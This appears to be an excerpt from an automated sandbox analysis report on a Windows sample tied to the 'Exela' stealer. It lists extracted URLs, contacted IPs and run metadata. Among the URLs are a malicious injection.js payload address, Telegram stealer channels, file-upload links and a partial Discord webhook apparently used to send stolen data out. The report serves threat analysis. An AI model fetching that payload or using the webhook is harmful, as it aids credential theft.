                                                                                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986134334.000002DCCE918000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://t.me/ExelaSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/quicaxd/Exela-V2.00DSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://raw.githubusercontent.com/justforExela/injection/main/injection.jsSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://discord.com/api/v8/users/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://i.hizliresim.com/qxnzimj.jpgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.apache.org/licenses/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653993804.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828426527.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.attrs.org/en/latest/names.html)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.twitch.tv/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.ver)svchost.exe, 0000003B.00000002.2895821645.000001B777C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    low
                                                                                                                    https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-fileSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmpfalse
                                                                                                                        high
                                                                                                                        https://open.spotify.com/user/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://filepreviews.io/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cryptography.io/en/latest/installation/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sySecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/python-attrs/attrs/issues/1165)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campaExela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.attrs.org/en/stable/changelog.htmlSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://cryptography.io/en/latest/security/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/python-attrs/attrs/issues/1141)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://i.hizliresim.com/6t31tw2.jpgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://thumbnails.roblox.com/v1/users/avatar?userIds=SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999597567.000002DCD0850000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.variomedia.de/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://bugs.python.org/issue37179SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://twitter.com/i/api/1.1/account/update_profile.jsonPSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://raw.githubusercontent.com/justforExela/injection/main/injection.js0ASecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.reddit.com/user/0SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970639661.000002DCD1F60000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.reddit.com/user/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pySecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://github.com/pyca/cryptography/issuesExela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://readthedocs.org/projects/cryptography/badge/?version=latestSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://t.me/ExelaStealerSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.attrs.org/Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.twitch.tv/P?SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://github.com/python-attrs/attrs/issues/1158)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://mahler:8092/site-updates.pySecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1975909415.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989967017.000002DCCF60B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1983700654.000002DCCF609000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          low
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.com/python-attrs/attrs/issues/1203)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.discordapp.com/avatars/0SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/pyca/cryptographySecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.python.org/download/releases/2.3/mro/.SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986134334.000002DCCE890000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662394777.000002DCCED46000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662353023.000002DCCED6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://cryptography.io/Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.python.org/3/library/asyncio-eventloop.htmlSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974121570.000002DCCEF1D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF19000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://python.org/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989717007.000002DCCF57B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1984324624.000002DCCF57A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670503006.000002DCCF5DD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976604985.000002DCCF578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://github.com/pyca/cryptography/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://gofile.io/d/mn2lNW)PSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://github.com/python-attrs/attrsSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    208.95.112.1
                                                                                                                                                                                                    ip-api.comUnited States
                                                                                                                                                                                                    53334TUT-ASUSfalse
                                                                                                                                                                                                    162.159.137.232
                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    162.159.128.233
                                                                                                                                                                                                    discord.comUnited States
                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    206.168.191.31
                                                                                                                                                                                                    store8.gofile.ioUnited States
                                                                                                                                                                                                    21777MASSIVE-NETWORKSUSfalse
                                                                                                                                                                                                    51.38.43.18
                                                                                                                                                                                                    api.gofile.ioFrance
                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                    IP
                                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                    Analysis ID:1431281
                                                                                                                                                                                                    Start date and time:2024-04-24 19:23:08 +02:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 11m 14s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:86
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
